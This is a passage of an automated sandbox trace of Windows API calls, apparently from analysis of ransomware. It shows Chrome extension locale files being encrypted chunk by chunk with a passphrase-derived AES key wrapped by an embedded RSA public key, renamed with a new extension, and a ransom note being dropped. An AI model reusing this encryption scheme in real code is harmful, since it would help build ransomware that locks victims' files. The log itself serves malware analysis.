lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.867] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.867] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.867] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.867] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.867] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.867] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.867] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.867] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.867] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.867] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.867] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.867] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.868] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.868] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.868] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.868] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.868] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.868] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.868] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.868] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.868] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0xf5, lpOverlapped=0x0) returned 1 [0262.868] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0xf5, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x100) returned 1 [0262.868] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x100, lpOverlapped=0x0) returned 1 [0262.868] CloseHandle (hObject=0x5d60) returned 1 [0262.868] CloseHandle (hObject=0x5d5c) returned 1 [0262.869] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fa\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fa\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fa\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fa\\messages.json"), bFailIfExists=0) returned 1 [0262.872] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fa\\messages.json", dwFileAttributes=0x0) returned 1 [0262.873] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fa\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fa\\messages.json.gsg")) returned 1 [0262.874] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fa\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fa\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fa\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fa\\messages.json.fuck")) returned 1 [0262.874] CryptDestroyHash (hHash=0x2e7fd40) returned 1 [0262.875] CryptDestroyKey (hKey=0x2e7de00) returned 1 [0262.875] CryptReleaseContext (hProv=0x2e7a500, dwFlags=0x0) returned 1 [0262.875] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0262.875] FindClose (in: hFindFile=0x2e7fc40 | out: hFindFile=0x2e7fc40) returned 1 [0262.875] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fa\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fa\\readme_back_files.htm")) returned 0xffffffff [0262.875] AreFileApisANSI () returned 1 [0262.875] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x275c330, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 162 [0262.875] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fa\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fa\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0262.876] GetFileType (hFile=0x5d64) returned 0x1 [0262.876] WriteFile (in: hFile=0x5d64, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0262.877] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0262.877] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fi\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e7fc40 [0262.877] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0262.877] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0262.877] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0262.877] GetLastError () returned 0x0 [0262.877] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fi\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fi\\messages.json")) returned 0x20 [0262.878] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fi\\messages.json", dwFileAttributes=0x80) returned 1 [0262.878] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fi\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fi\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0262.879] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fi\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fi\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0262.880] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fi\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0262.880] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e7a500) returned 1 [0262.882] CryptCreateHash (in: hProv=0x2e7a500, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0262.882] lstrlenA (lpString="nyVZwrEPeJcSGZnLzNUpNIeDzMlQm") returned 29 [0262.882] CryptHashData (hHash=0x2e7fd40, pbData=0x28cb788, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0262.882] CryptDeriveKey (in: hProv=0x2e7a500, Algid=0x6610, hBaseData=0x2e7fd40, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e7de00) returned 1 [0262.882] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----o", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0262.882] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0262.882] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e744d8) returned 1 [0262.882] CryptImportPublicKeyInfo (in: hCryptProv=0x2e744d8, dwCertEncodingType=0x1, pInfo=0x2eacc00*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2eacc30*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2eacc38*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e7e5c0) returned 1 [0262.882] CryptEncrypt (in: hKey=0x2e7e5c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0262.882] CryptEncrypt (in: hKey=0x2e7e5c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e73ce0*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e73ce0*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0262.882] WriteFile (in: hFile=0x5d60, lpBuffer=0x2e73ce0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e73ce0*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0262.883] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.885] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.885] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.893] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.894] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.894] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.894] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.894] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.894] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.894] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.894] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.894] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.894] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.894] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.894] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.895] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.895] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.895] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.895] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.895] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.895] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.895] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.895] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.895] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.895] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.895] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.895] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.895] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.895] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.895] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.896] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.896] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.896] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.896] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.896] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.896] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, 